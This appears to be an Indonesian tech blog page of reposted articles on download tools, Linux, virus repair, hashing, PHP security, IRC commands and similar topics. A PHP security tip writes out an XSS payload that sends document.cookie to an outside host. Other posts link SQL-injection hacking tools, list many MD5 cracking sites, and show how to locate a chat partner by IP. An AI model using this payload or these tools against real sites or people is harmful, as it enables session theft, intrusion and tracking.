DownThemAll, untuk Percepat Download di Mozzila

DownThemAll (DTA) adalah download manager / accelerator ekstensi untuk Mozilla Firefox, berlisensi di bawah GPL. Dapat menghentikan sementara dan restart mendukung download kapan saja, tanpa kehilangan data, dan memungkinkan pengguna untuk men-download seluruh link, gambar atau objek yang terdapat di dalam sebuah halaman web. Kedua HTTP dan FTP protokol yang didukung.

Salah satu fitur utama dari DownThemAll adalah kemampuan untuk multi-bagian download. Fitur ini mirip dengan fitur pada GetRight dan Download Accelerator Plus. Bila diaktifkan, ini memungkinkan pengguna untuk men-download file dalam buah, maka buah yang menggabungkan setelah selesai men-download sehingga meningkatkan kecepatan download saat terhubung ke server yang lambat. 1.0b1 menambahkan Metalink dukungan yang memungkinkan beberapa URL untuk setiap file yang akan disampaikan ke DTA, bersama dengan checksum dan informasi lainnya.

Kita download saja addons Mozilla berikut di link berikut DownThemAll

kemudian Instal pada addons mozilla kita, dan rasakan perbedaan kecepatan kita download dengan sebelumnya. sebelum kita menggunakan Addons ini.

Sabily, Ubuntu Moslem Edition 9.04

Setelah Ubuntu 9.04 di rilis pada 20 April 2009 kemarin, tidak lama kemudian muncul distro Ubuntu yang telah di modifikasi (ditambah) dengan berbagai software islami. Linux ini sebelumnya lebih populer dengan nama Ubuntu Moslem Edition dan kali ini diubah dengan nama Sabily.

Sabily 9.04 dengan kode nama Taibah ini menyertakan berbagai software islam, seperti pengingat sholat, Al-Qur’an browser, bacaan Al-Qur’an beberapa syaikh, dan lainnya

Sabily 9.04 ini tersedia dalam 3 paket yang dapat dipilih :

• Small version (935 MB), yang berisi Paket utama Sabily, aplikasi islami dan dukungan Arabic


• Full version (1.4 GB), isinya seperti diatas dengan tambahan multimedia, paket edukasi dan tambahan lainnya. selengkapnya


• Full version with recitations (2.8 GB) Isinya seperti paket full version dengan tambahan bacaan Qur’an dari Muhammad Siddiq al-Minshawi, Huzify, Sa’ad al-Ghamadi dan Mushary Rasyid Al-afasy

Download paket CD (184 MB) juga disediakan untuk meng-konversi Ubuntu 9.04 menjadi Sabily 9.04.

Apa Saja isi Sabily 9.04 ?

Seperti halnya Ubuntu 9.04, Sabily tetap seperti induknya, menyertakan fitur utama Ubuntu disertai dengan program-program islam seperti :

Tampilan wallpaper sabily, theme, cursor san lainnya

• Minbar, aplikasi pengingat sholat


• Zekr, Aplikasi yang berisi Al-Qur’an dan terjemahnya


• Monajat, aplikasi yang memberikan informasi waktu sholat setiap waktu tertentu


• Firefox-praytimes, tambahan aplikasi di browser Mozilla Firefox untuk menampilkan waktu sholat


• webstrict, Aplikasi untuk memfilter konten website


• thwab, Sistem Ensiklopedia elektronik


• hijra, kalender islami


• mus-haf Othman, Aplikasi browser Qur’an


• Mendukung Arabic, meliputi : tampilan/antarmuka berbahasa arab, dictionary untuk pengecekan kata, acon (text console) dan bicon ( console yang mendukung tampilan text bidirectional).

Fitur-fitur diatas adalah fitur paket Small version. Untuk paket Full version ditambah dengan paket ubuntu lainnya seperti : w32codec, vlc multimedia player, flash plugins, Microsoft TruType core fonts, berbagai program edukasi seperti : stellarium, celestia, kstars, kalzium, tuxmath, dan lainnya. Selain itu disertakan juga paket java-runtime-environment (JRE), rar, unrar, linscape, virtual box, ubuntu tweak, gparted dan lainnya. Selengkapnya

Untuk paket Full version with recitations, disertai dengan tambahan bacaan Al-Qur’an dari Muhammad Siddeeq al-Minshawi (16kbps, 193 MB), Huzify (24 kbps, 322 MB), Sa’ad al-Ghamadi (40 kbps, 433 MB) dan Mishary Rashed Alafasy (40 kbps, 508 MB).

Beberapa tampilan Sabily 9.04

( klik untuk memperbesar gambarnya )

sumber : Sabily Website

Memperbaiki Kerusakan Sistem Komputer akibat Virus

Kerusakan semacam itu biasanya bisa diperbaiki baik manual, menggunakan CD Windows atau dengan software pihak ketiga.

Jika kita mempunyai CD master windows, dan kerusakan cukup parah, biasanya masih bisa diatasi dengan memanfaatkan fitur Repair (baca : Cara me-repair (memperbaiki) Installasi Windows XP )

Kali ini akan dibahas cara memperbaiki sistem windows yang rusak baik disebabkan oleh malware, virus dan sejenisnya atau sebab lainnya dengan Program System Repair Engineer (SREng).

System Repair Engineer (SREng)

System Repair Engineer (SREng) merupakan sebuah program kecil (kurang dari 2 MB), portable dan gratis (free) yang di kembangkan oleh KZTechs.COM webmaster, Smallfrogs ( telah memperoleh penghargaan Microsoft Most Valuable Professional (MVP) for Windows Shell - di China dari 2004-2008). Program ini ditujukan untuk mendeteksi berbagai permasalahan umum sistem dan kerusakan umum yang biasanya disebabkan oleh virus komputer.

Untuk tingkat ahli (advance), program ini dapat digunakan untuk mendeteksi berbagai permasalahan dan memperbaiki sendiri. Sedangkan untuk pengguna biasa (awam), terdapat fungsi Smart Scan untuk memeriksa komputer dan menghasilkan report (laporan) sehingga disimpan untuk selanjutnya bisa di analisa dan diperiksa oleh orang yang lebih ahli.

Meskipun begitu, terdapat berbagai fitur yang langsung dapat digunakan meski oleh kebanyakan pengguna komputer. Berikut penjelasan beberapa fitur dan fungsinya yang bisa kita manfaatkan.

Boot Items

Menampilkan daftar program atau aplikasi apa saja yang otomatis berjalan ketika windows booting, baik dari registry ( termasuk item yang tersembunyi, UserInit dan lainnya), Folders, Task Scheduled, Services dan Boot.ini. Jika melihat adanya program yang aneh (mencurigakan), maka kita bisa menon-aktifkannya dengan cara menghilangkan tanda cek-nya.

Setelah di dihilangkan tanda cek, maka klik tombol Refresh, untuk memastikan bahwa pengubahan telah tersimpan. Jika ternyata tanda cek kembali muncul atau muncul daftar baru dengan nama yang lain, merupakan indikasi kuat bahwa komputer sedang terinfeksi virus atau malware lainnya ( sebaiknya komputer/hardisk di scan baik dengan Bootable CD, virus scanner portable, atau memindah Hardisk di komputer lain dan discan dari sana).

System Repair

Di menu ini ada beberapa fungsi terpisah, diantaranya adalah :

File Association

Menampilkan status ekstensi file-file umum seperti : .TXT, .EXE, .COM, .PIF, .REG, .BAT, .SCR, .CHM, .VBS dan lainnya. Jika Status tidak menunjukkan “Normal” atau kita tidak bisa menjalankan file dengan salah satu ekstensi tersebut, maka kita bisa memperbaiki dengan memilih ekstensi file yang bermasalah dan klik Repair.

Windows Shell/IE

Di bagian ini, kita akan melihat daftar-daftar pengaturan windows (setting) yang biasanya diubah/dirusak oleh virus, seperti :

• Menu Start/Run tidak aktif


• Registry Editor (regedit.exe) tidak bisa dibuka


• Command Prompt, wallpaper, Control Panel tidak bisa diakses.


• Drive di My Computer tidak terlihat


• Tombol Log off tidak muncul


• Menu “file” di windows Explorer tidak tampil


• Icon di desktop tidak tampil



• Folder Options tidak bisa diaktifkan


• Tombol search (pencarian) tidak tampil


• Windows Explorer atau system tray tidak bisa di klik kanan


• Untuk menampilkan files yang tersembunyi (Hidden files)


• Berbagai tampilan menu di Internet Explorer yang tidak muncul


• berbagai pengaturan lainnya

Untuk memperbaiki setting diatas, pilih dari daftar yang ada dan klik Repair.

Browser Add-ons

Menampilkan daftar plugins/add-ons (fitur tambahan) yang berjalan dengan web browser yang digunakan. Kita dapat melihat informasi detail, menyembunyikan atau menghapus add-on yang tidak diinginkan.

HOSTS File

Hosts file merupakan daftar host name dan mapping alamat IP. Misalnya terdapat baris sebagai berikut :

127.0.0.1 localhost

Berarti ketika kita mengetikkan localhost di web browser akan di mapping ke alamat IP 127.0.0.1. Untuk informasi selengkapnya bisa melihat http://support.microsoft.com/?id=108295

File ini bisa diubah oleh spyware atau malware agar ketika menulis alamat web tertentu sebenarnya dialihkan ke alamat IP yang tidak benar.

Winsock Provider

Akan menampilkan daftar Windows Socket API (Winsock), yang menangani masalah akses jaringan, terutama TCP/IP.

Di menu ini terdapat fitur “Reset All to default values”, yang dapat dimanfaatkan jika koneksi internet tidak bisa berjalan seperti sebelumnya (bermasalah) atau ketika tiba-tiba kita tidak bisa browsing, mengirim email atau operasi jaringan lainnya, padahal koneksi internet berjalan normal.

Tetapi ketika koneksi jaringan berjalan baik dan kita bisa browsing, mengirim email atau mengerjakan operasi jaringan lainnya, tidak disarankan untuk di Reset. Selengkapnya tentang Winsock

Advanced Repair

Terdapat dua pengaturan di menu ini, yaitu Recommended Fix Level dan Powerful Fix Level. Ada juga tombol untuk me-Reset Winsock, memperbaki Safe Mode dan Melakukan Scan API Hook ( tingkat lanjut).

Smart Scan

Smart scan akan melakukan scan komputer menghasilkan laporan secara detail tentang sistem komputer yang selanjutnya bisa digunakan oleh orang yang lebih ahli untuk memeriksa dan mengatasi permasalahan komputer.

Extensions

SREng mendukung tambahan fitur yang bisa ditambahkan secara terpisah (bisa juga membuat tambahan/plugins sendiri). Di Halaman Download SREng disertakan beberapa plugins seperti :

• NTFS Stream Scanner, untuk memeriksa format NTFS dari adanya data berbahaya


• Windows Shell Menu Manager, untuk mengatur windows shell menu seperti menu ketika klik kanan desktop dan lainnya.


• File Figital Sign Verify, mengetahui dan verifikasi digital signature sebuah file.



• Network Activity Monitor, memonitor aktivitas/status jaringan dan memberikan informasi detail tentang koneksi tersebut.

Satu hal yang mungkin agak kurang adalah belum adanya file bantuan (manual) yang berbahasa Inggris, adanya dalam bahasa China dan itupun masih membahas versi 2.5. Terlepas dari hal itu, program ini sangat bermanfaat dan bisa berjalan di sistem operasi : Windows 98SE, ME, 2000, XP 32bit, Server 2003 32bit, Vista 32bit, Server 2008 32bit.

Download System Repair Engineer

sumber : http://ebsoft.web.id/

Linux Basic Command (Perintah Dasar Linux)

Instruksi Dasar

Linux punya instruksi dasar yang diwariskan turun temurun 1 Karena berbasis UNIX, maka instruksi dibawah ini umumnya Kompatible untuk semua distro linux, keluarga BSD,dan Solaris.

Untuk menjalankan instruksi di Linux, gunakan Terminal atau Shell. Ada banyak program shell, salah satu yang paling banyak digunakan adalah BASH (Bourne Again Shell)

Memang instruksi di linux mirip dengan instruksi ala DOS tempo dulu 1 Tapi bedanya, instruksi di Linux sangat “powerfull” sedang instruksi DOS sangat “sontoloyo” alias lemot - lemah otak ! Hehehe.

cat
Perintah untuk menampilkan isi teks file
cat [namafile]
#cat /etc/rc.d/rc.module
$cat /tmp/suratcintabuatkamu

Cd
Perintah untuk Pindah direktori
$ cd [nama direktori]
$ cd /home/mic/picture

Maka direktori aktif akan berpindah ke /home/mic/picture

Cfdisk
Perintah untuk mempartisi hardisk
#cfdisk /dev/sda

Chfn
change finger information -perintah untuk merubah finger informatin user
chfn [user name]
$ chfn mic

Chgrp
Memilih group owner dari sebuah file/direktori (hanya root yang bisa melakukannya ! )
#chgrp [group] [file/direktori name]
#chgrp eagle /tmp/raptor/data/test1.doc
#chgrp eagle -r /tmp/raptor/picture

R=recursive

Chmod
Perintah untuk Mengubah mode proteksi /file permission file atau direktori
$ chmod [permission] file/direktori

RWX RWX RWX
Owner Group Other
$ chmod 755 /home/mic/picture/*.*
RWXRWXRWX
111101101
$ chmod 700 /home/mic/secret
rwxrwxrwx
111000000

Clear
Perintah untuk membersihkan layar
$clear

Cp
Perintah untuk Mencopy file
$ cp [source] [destination]
$ cp sakura.jpg /home/mic/picture

Maka file gambar sakura.jpg akan dipindahkan ke direktori /home/mic/picture

Grep
Perintah untuk melakukan scan file terhadap karakter tertentu
grep “pattern” filename
$grep “love” /tmp/doc/*

Halt
Perintah untuk meng-halt system (hanya root yang bisa ! )
#halt –h now

Matikan system sekarang !!

Init*
Perintah melakukan perpindahan antar level.
init 0123456
0=halt the system
1=single user mode
2=multi user without NFS
3=Full Multi user
4=unused
5=start X window
6=reboot system
# init 6
reboot
# init 5
startx window

Umumnya default adalah init 3

Ln- Symbolic Link
Perintah untuk memberikan nama link terhadap suatu file
$ ln -s [file] [ link name]
$ ln -s /home/mic/picture/sakura.jpg saku

Locate*
Perintah untuk pencarian file dengan cepat
locate [file name]
$locate UAS_Elektro2005.doc

Ls
Perintah untuk Melihat isi direktori
$ ls

Akan ditampilkan isi folder Anda.
$ ls -la

Akan ditampilan isi folder lengkap dengan hak akses (file permission)

Mkdir
make directory- perintah untuk membuat direktori
#mkdir /mnt/flashdisk
#mkdir 755 /tmp/musik/dangdut

Mv
Perintah untuk Memindah file /direktori
$ mv [source] [destination]
$ mv sakura.jpg /home/mic/picture

File sakura.jpg akan dipindahkan ke direktori /home/mic/picture
Hati-hati ! memindah berbeda dengan mencopy lho !
$ mv sakura.jpg bunga.jpg

Nama file sakura.jpg berubah menjadi bunga.jpg
$ mv /home/mic/picture /home/mic/gambar

Direktori /home/mic/picture berubah nama menjadi /home/mic/gambar

Ping
Perintah untuk mengecek keaktifan suatu komputer/server dalam jaringan
ping [hostname/IP number]
#ping skylarx2
#ping 192.168.0.17
#ping www.yahoo.com (jika terhubung ke-internet)

Pkgtool
Perintah pada slackware untuk menambah, meremove, melihat program. Pkgtool juga dapat digunakan untuk mengatur konfigurasi global sistem Linux. (Hanya berlaku bagi root ! )
#pkgtool

Pwd
Perintah untuk melihat direktori aktif
$ pwd

Jika Anda berada di /home/mic/lagu/avril, maka setelah mengetikkan pwd akan muncul
/home/mic/lagu/avril

Rm
Perintah untuk Menghapus file /direktori
$ rm [file name]
$ rm /home/mic/gambar/bunga.jpg
$ rm -r /home/mic/gambar
$ rm /tmp/musik/barat/asktoomuch.mp3

Pada contoh ke-3, penggunaan r akan menyebabkan semua file dan folder /home/mic/gambar akan ‘amblas’ 1 (r= recursive)

Rmdir
remove direktory - perintah untuk meremove directory
#rmdir /tmp/musik/dangdut/omairama

Shutdown
Perintah untuk shutdown
Shutdown
#shutdown -h now
shutdown tanpa ada peringatan.
#shutdown -t 15
shutdown 15 detik lagi…..cepat save file Anda ! hehehe
#shutdown -r now
merestart komputer !

Startx
Perintah untuk mengaktifkan system X window — (perintah paling populer 1)
$startx

Jika terjadi “kecelakaan” tekan Ctrl-Alt-Backspace untuk keluar dari system X window

Su
Menjadi superuser atau log sebagai user ID lain
$su [username]
$su
password :***************
# (sudah sebagai superuser)
$su michael
password :***************
$ (log sebagai michael)

Top
Perintah untuk mengetahui proses yang terjadi
$top

Touch
Perintah untuk membuat file kosong
touch [file name]
$touch /tmp/cobadeh

Useradd /userdel*
Perintah untuk menambah /menghapus user (hanya root yang bisa! )
useradd [user name]
#useradd swe4tg1rl
#userdel rajajud1

Which
Perintah untuk menunjukan letak file yang diakses
which [file name]
$which /tmp/data

Whereis
Perintah untuk mencari sebuah file
Whereis [namafile]
$whereis bab2.doc

Xinit
Init X window tanpa perlu masuk ke window manager

sumber : http://cyberdos.org

Mengenal Jenis Enkripsi

Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut tidak dapat dibaca tanpa bantuan pengetahuan khusus.
Keuntungan dari enkripsi adalah kode asli kita tidak dapat dibaca oleh orang lain.
Berikut ada beberapa macam metode enkripsi yang dapat anda digunakan pada pemrograman website seperti PHP, ASP dan yang lainnya.

1. Metode Enkripsi MD2
Message-Digest algortihm 2 (MD2) adalah fungsi hash cryptographic yang dikembangkan oleh Ronald Rivest pada tahun 1989.
Algoritma dioptimalkan untuk komputer 8-bit. MD2 yang ditetapkan dalam RFC 1319.
Meskipun algoritma lainnya telah diusulkan sejak dulu, seperti MD4, MD5 dan SHA, bahkan sampai dengan 2004 [update] MD2 tetap digunakan dalam infrastruktur kunci publik sebagai bagian dari sertifikat yang dihasilkan dengan MD2 dan RSA.

2. Metode Enkripsi MD4
Message-Digest algortihm 4(seri ke-4) yang dirancang oleh Profesor Ronald Rivest dari MIT pada tahun 1990.
Panjangnya adalah 128 bit.
MD4 juga digunakan untuk menghitung NT-hash ringkasan password pada Microsoft Windows NT, XP dan Vista.

3. Metode Enkripsi MD5
MD5 adalah salah satu dari serangkaian algortima message digest yang didesain oleh Profesor Ronald Rivest dari MIT (Rivest, 1994).
Saat kerja analitik menunjukkan bahwa pendahulu MD5 yaitu MD4 mulai tidak aman, MD5 kemudian didesain pada tahun 1991 sebagai pengganti dari MD4 (kelemahan MD4 ditemukan oleh Hans Dobbertin).
Dalam kriptografi, MD5 (Message-Digest algortihm 5) ialah fungsi hash kriptografik yang digunakan secara luas dengan hash value 128-bit.
Pada standart Internet (RFC 1321), MD5 telah dimanfaatkan secara bermacam-macam pada aplikasi keamanan, dan MD5 juga umum digunakan untuk melakukan pengujian integritas sebuah file.

4. Metode Enkripsi SHA
SHA adalah serangkaian fungsi cryptographic hash yang dirancang oleh National Security Agency (NSA) dan diterbitkan oleh NIST sebagai US Federal Information Processing Standard.
SHA adalah Secure Hash Algoritma. Jenis-jenis SHA yaitu SHA-0, SHA-1, dan SHA-2.
Untuk SHA-2 menggunakan algoritma yang identik dengan ringkasan ukuran variabel yang terkenal sebagai SHA-224, SHA-256, SHA-384, dan SHA-512.

5. Metode Enkripsi RC4
RC4 merupakan salah satu jenis stream cipher, yaitu memproses unit atau input data pada satu saat. Unit atau data pada umumnya sebuah byte atau bahkan kadang kadang bit (byte dalam hal RC4).
Dengan cara ini enkripsi atau dekripsi dapat dilaksanakan pada panjang yang variabel.
RC4 adalah penyandian stream cipher yang dibuat oleh Ron Riverst pada tahun 1987 untuk pengamanan RSA.
Algoritmanya didasarkan pada permutasi acak.

6. Metode Enkripsi Base64
Base64 adalah sistem untuk mewakili data mentah byte sebagai karakter ASCII.
Base64 menyediakan 6-bit encoding 8-bit ASCII karakter.
Base64 merupakan format yang dicetak menggunakan karakter, memungkinkan binari data yang akan dikirim dalam bentuk dan email, dan akan disimpan di database atau file.

sumber : http://securehacklink.org

Melacak IP Adderss

1.cara melacak alamt IP suatu situs
untuk melakukan hal ini tidak diperlukan suatu software khusus cukup menggunakan
fasilitas yang telah disediakan oleh windows.Kita bisa menggunakan Dos.Caranya
masuk ke comand prompt.anda bisa klik Run-cmd-dan ketikkan ping
Nama situs yang ingin dilacak lalu tekan enter.Setelah
anda tekan enter,maka akan tertera alamat IP situs tersebut.

2.Melacak lokasi server(real address)
Setelah anda mendapatkan IP address situs tersebut.Andapun bisa mengetahui
dimana lokasi negara dan kota situs tersebut berada.Caranya buka
www.domainwhitepages.com.Lalu masukkan IP address situs tersebut atau alamat
situs tersebut.andapun akan mendapatkan informasi lengkap tentang lokasi situs tersebut.

Setelah anda membaca 2 trik diatas,kita bisa menggabungkan 2 trik tersebut untuk Melacak IP address Lawan chatting.Kitapun bisa mengetahui IP address lawan chatting kita menggunakan Yahoo Messenger.Caranya adalah:kirimkan satu file bebas apa saja.mengapa harus mengirimkan file terlebih dahulu?ini berfungsi sebagai timing waktu untuk mengetikkan perintah perintah untuk menampilkan IP adrress teman chatt anda.Disarankan diatas 500 kb.Lebih besar file yang dikirim lebih bagus,karena akan menyebabkan waktu anda lebih banyak.Kemudian masuk ke Dos melalui command prompt(Run-cmd)lalu ketikkan NETSTAT -N dan tekan enter.Maka alamat IP teman chatting anda akan muncul beserta port yang digunakan untuk mengirim file tadi.contoh:202.133.80.45 :3000+++.(202.133.80.45 adalah nomor IP dan 3000+++ adalah port yang tadi anda kirimin file.untuk mengetahui lokasi lawan chatting anda seperti berada di kampus,kantor ataupun warnet mana,anda bisa chek di www.domainwhitepages.com dengan memasukkan alamat IP yang telah anda dapatkan

sumber : http://cyberdos.org

Security Knowledge in PHP

Keamanan 1 :
Hindari menggunakan sebuah variabel untuk include : Misalnya
include($_GET["string"]);
Bila terpaksa coba untuk validasi

Keamanan 2 :
Hindari register global = on (ini sudah basic). Register global dapat menyebabkan variabel saling bentrok. misalkan variabel $_GET["login"] dan $_SESSION["login"] yang sama namanya kan bila register global on akan terlihat $login saja. dalam hal ini $login yang milik get yang menang.

Keamanan 3 :
Validasi posting form kamu, gunakan HTMLSPECIALCHARS(); orang yang jahat dapat memasukkan data ini kedalam form login kamu

HTMLSPECIALCHAR akan mengconvert kata < menjadi < dan > menjadi >

Keamaman 4 :
XSS atau Cross Site Scripting adalah trend baru sekarang, kita cukup memasukkan data tambahan


nah, perintah diatas sana bisa dimodifikasi menjadi sebuah perintah window.open(http://www.apaaja.com+'?cookies=' + document.cookie);
maka hacker akan mampu mengambil valid session id dari cookie.

Keamanan 5
Intepreter PHP3 dan beberapa versi awal PHP 4.0.x punya masalah dalam logging error. PHP akan memanggil fungsi C yaitu functions syslog() dan vsnprintf() dalam melakukan logging. Sangat mungkin data yang dikirim ke fungsi itu adalah user input.

Keamanan 6 :
is_uploaded_file($path) harus digunakan untuk memvalidasi file yang diupload (agar tidak ada user yang memasukkan path palsu kedalam form upload untuk mengambil file lain).

Keamanan 7 :
hati-hati, jangan pernah menjalankan input yang belum unescaped query. Hal ini dapat menyebabkan SQL Injection. Selalu hapus karakter ' dan " yang berasal dari input atau tambahkan \. Misalkan login form, input yang kalian harapkan akan berkisar dari 0-9 dan a-z bila ada karakter ' (petik satu) atau lainnya harus dihapus.

Keamanan 8 :
hati-hati perintah eval() yang mampu mengeksekusi sebuah string seperti PHP code. Jangan izinkan input dari user asing tanpa validasi.
$string = 'cup';
$name = 'coffee';
$str = 'This is a $string with my $name in it.';
echo $str. "\n";
eval("\$str = \"$str\";");
echo $str. "\n";
?>

hasilnya
This is a $string with my $name in it.
This is a cup with my coffee in it.

keamanan 9 :
untuk semua file include kamu, pakai extension *.php jangan *.inc, *.h atau sejenisnya karena dapat dengan mudah terbuka pada browser (tampil sebagai text bukan hasil output script). Lebih baik lagi bila melakukan konfigurasi di apache conf agar *.htm dianggap sebagai file php.

sumber : http://securehacklink.org

Alat perang pengetest website

http://www.4shared. com/file/ 103908451/ 1db4bbe6/ SQL_Exploiter_ Pro_v210. html
http://www.4shared. com/file/ 103908789/ a487f3c0/ SQL_Injection_ Pentesting_ TooL30.html
http://www.4shared. com/file/ 71839955/ 297f0caa/ Sql-Injection. html
http://www.4shared. com/file/ 106058970/ ed8a8bbe/ Web_Hacking_ Tools.html

sumber : http://securehacklink.org

Online md5 Cracker Database

http://www.cmd5.com/english.aspx
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://www.md5decrypter.com/

http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.mil?rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://?p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://?p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…pproducts_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

sumber : antihackerlink

SMS Gratis via Facebook

1. Buat yang belum punya facebook, ayo buat facebook dulu..., klo udah punya, silahkan
masuk/log in dulu ke account facebook kamu.



2. Next step, seperti di atas kamu klik disini  untuk menuju ke ui.sg.

3. Nah, kamu juga akan langsung didirect ke www.dodotext.com

4. Selanjutnya klik link Facebook pada Add Our Facebook Application



5. Klo udah, Allow untuk mengizinkan aplikasi



6. Kemudian add aplikasi ke profil.




7. Sama juga seperti di atas, kamu setting negara tujuan SMS, Nomor HP tujuan, dan ketik SMS
kamu seperti biasa (max 100 karakter), lalu Send SMS.




8. Selesai

sumber: http://cyberdos.org

Daftar Command mIRC

Berikut daftar command-command yang ada di mIRC :
ChanServ
http://rello.fileave.com/mIRC-logo.jpg

1. Register Channel = /cs register (#channel) (password) (desikripsi)

2. Identify Channel = /cs identify (#channel) (password)

3. Successor = /cs set (#channel) successor (nickname)

4. Drop Channel = /cs drop (#channel)

5. Ganti Pass Channel = /cs set (#channel) passwd (password lama) (password
baru)

6. Lupa Pass Channel = /cs sendpass (#channel) (email)

7. Founder Baru (Identify #Channel Dulu) = /cs set (#channel) founder

8. Mailblock = /cs set (#channel) mailblock (on/off)

9. Private = /cs set (#channel) private (on/off)

10. Set Description = /cs set (#channel) desc (deskripsinya)

11. Set Topic = /cs set (#channel) topik (topiknya)

12. Set URL = /cs set (#channel) url (alamat url-nya)

13. Set Mlock = /cs set (#channel) mlock (tulis modenya)

14. Set Restrict = /cs set (#channel) restrict (on/off)

15. Set KeepTopic = /cs set (#channel) keeptopic (on/off)

16. Set TopikLock = /cs set (#channel) topikclock (off/sop/founder)

17. Set Memo Channel = /cs set (#channel) memo (none/aop/sop/founder)

18. Set OP-Guard = /cs set (#channel) opguard (on/off)

19. Add/Del Sop = /cs sop (#channel) (add/del) (nick)

20. Add/Del Aop = /cs aop (#channel) (add/del) (nick)

21. Lihat List Op = /cs (aop/sop) (#channel) list

22. Akick Nick = /cs akick (#channel) (add/del) (Nick!*@*)

23. Akick Ident = /cs akick (#channel) (add/del) (*!ident@*)

24. Akick IP Address = /cs akick (#channel) (add/del) (*!*@IP Addressnya)

25. Akick List = /cs akick (#channel) list

26. Op List = /cs (sop/aop) (#channel) list

27. Lihat Akses = /cs why (#channel) (nick)

28. Unban = /cs unban (#channel) (nick)

29. Invite = /cs invite (#channel) (nick)

30. Info = /cs info (#channel)

31. Access Channel = /cs access (#channel) (nick op)

32. Count = /cs count (#channel)

===========================================================

NickServ :

1. Register Nick = /ns register (password) (email)

2. Identify Nick = /ns identify (password)

3. Ganti Pass = /ns set passwd (password lama) (password baru)

4. Enforce = /ns set enforce (on/off)

5. Kill Ghost = /ns ghost (nick) (password)

6. Kill = /ns set kill (on/off)

7. Recover = /ns recover (nick) (password)

8. Release = /ns release (nick) (password)

9. Drop = /ns drop (nick)

10. No Op = /ns set noop (on/off)

11. No Memo = /ns set nomemo (on/off)

12. Info = /ns info (nickname)

13. URL = /ns set url (http:// )

14. Ganti Email = /ns set email (password) (emailnya)

15. Showemail = /ns set showemail (on/off)

16. MailBlock = /ns set mailblock (on/off)

MemoServ :

1. Send Nick = /ms send (nickname) (pesan)

2. Send OP = /ms send (#channel) (pesan)

3. Send SOP = /ms sendsop (#channel) (pesan)

4. Lihat Memo = /ms list

5. Baca Memo = /ms read (no. list memo)

6. Hapus Memo = /ms del (no. list memo)

7. Hapus Semua = /ms del all

Perintah Dasar mIRC :

1. Ganti nick = /nick (nick baru)

2. Notice = /notice (nick) (pesan)

3. Masuk Channel = /join (#channel)

4. Keluar Channel = /part (#channel)

5. Keluar IRC = /quit (pesan)

